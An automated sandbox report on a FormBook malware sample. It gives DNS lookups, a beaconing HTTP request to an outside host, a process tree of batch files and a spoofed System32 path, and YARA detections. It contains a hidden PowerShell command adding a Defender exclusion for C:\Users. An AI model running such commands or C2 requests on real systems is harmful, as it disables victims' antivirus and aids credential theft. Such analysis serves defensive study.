                                                                        May 12, 2021 06:29:58.856905937 CEST8.8.8.8192.168.2.40xa3adNo error (0)xhtfga.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:29:58.856905937 CEST8.8.8.8192.168.2.40xa3adNo error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:30:34.523298979 CEST8.8.8.8192.168.2.40x5ab7No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:30:35.345573902 CEST8.8.8.8192.168.2.40x3e0eNo error (0)xhtfga.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:30:35.345573902 CEST8.8.8.8192.168.2.40x3e0eNo error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:30:42.173862934 CEST8.8.8.8192.168.2.40x3ac6No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:30:42.794504881 CEST8.8.8.8192.168.2.40x8937No error (0)xhtfga.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:30:42.794504881 CEST8.8.8.8192.168.2.40x8937No error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)www.georgeswebwerks.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                        May 12, 2021 06:31:55.602200031 CEST8.8.8.8192.168.2.40x3d1aNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                        May 12, 2021 06:32:01.675105095 CEST8.8.8.8192.168.2.40x70e6No error (0)www.rest-blog.com118.27.99.91A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.georgeswebwerks.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449779198.54.117.21280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        May 12, 2021 06:31:55.808212996 CEST8204OUTGET /qku9/?6lPDSJPH=4N2BxPNrndQhx4f7lxE8pKNuaIuSTDwEioPJ3Oup1sIb+BTUhD7Z9dt/VxNIQWQk9DQP&u8eTH=YdsPJP HTTP/1.1
                                                                        Host: www.georgeswebwerks.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe PID: 7056 Parent PID: 5860

                                                                        General

                                                                        Start time:06:29:54
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe'
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Yara matches:
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681744195.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680695317.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680995557.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680590350.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680350085.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681371824.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681401941.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680945161.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681291309.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680731974.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681518622.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681644403.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680558315.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680395573.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681105272.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680649667.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680465750.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680834429.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681184778.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680869212.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681329626.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680618860.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681146145.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680798955.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681439102.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681062128.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680427643.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680522649.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681564607.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681236193.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.681840426.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680764371.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000000.00000003.680899857.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        Reputation:low

                                                                        Analysis Process: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe PID: 684 Parent PID: 7056

                                                                        General

                                                                        Start time:06:30:15
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: cmd.exe PID: 6252 Parent PID: 7056

                                                                        General

                                                                        Start time:06:30:16
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
                                                                        Imagebase:0x11d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6232 Parent PID: 6252

                                                                        General

                                                                        Start time:06:30:16
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: cmd.exe PID: 6592 Parent PID: 6252

                                                                        General

                                                                        Start time:06:30:17
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat
                                                                        Imagebase:0x11d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6804 Parent PID: 6592

                                                                        General

                                                                        Start time:06:30:17
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: Netplwiz.exe PID: 6408 Parent PID: 6592

                                                                        General

                                                                        Start time:06:30:17
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows \System32\Netplwiz.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows \System32\Netplwiz.exe
                                                                        Imagebase:0x7ff61ad30000
                                                                        File size:40448 bytes
                                                                        MD5 hash:F94B7FB6DAC49844D03C7087B2D8B472
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        Analysis Process: cmd.exe PID: 6516 Parent PID: 6408

                                                                        General

                                                                        Start time:06:30:18
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat
                                                                        Imagebase:0x7ff622070000
                                                                        File size:273920 bytes
                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 5684 Parent PID: 6516

                                                                        General

                                                                        Start time:06:30:18
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: powershell.exe PID: 6920 Parent PID: 6516

                                                                        General

                                                                        Start time:06:30:19
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users''
                                                                        Imagebase:0x7ff7bedd0000
                                                                        File size:447488 bytes
                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6912 Parent PID: 6920

                                                                        General

                                                                        Start time:06:30:20
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: Citvon.exe PID: 1320 Parent PID: 3424

                                                                        General

                                                                        Start time:06:30:28
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\Public\Citvon\Citvon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\Public\Citvon\Citvon.exe'
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Yara matches:
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776445202.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.777072659.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775505378.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776207302.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.777194566.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775598772.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776689752.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775112888.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776879141.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776094630.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774258125.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775315084.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775824853.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.777314398.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775903098.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775665097.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774536260.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774973034.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774813034.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775978278.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776284853.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776822633.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775198521.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776766122.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775748652.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.775417344.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776363744.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776524583.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776620878.0000000003BD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.776945526.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774394805.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774870896.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000011.00000003.774740375.0000000003CA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 44%, Metadefender, Browse
                                                                        • Detection: 66%, ReversingLabs
                                                                        Reputation:low

                                                                        Analysis Process: Citvon.exe PID: 4424 Parent PID: 3424

                                                                        General

                                                                        Start time:06:30:36
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\Public\Citvon\Citvon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\Public\Citvon\Citvon.exe'
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Yara matches:
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794009092.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793842362.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792672644.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.791925004.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793060027.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793181479.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794640996.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
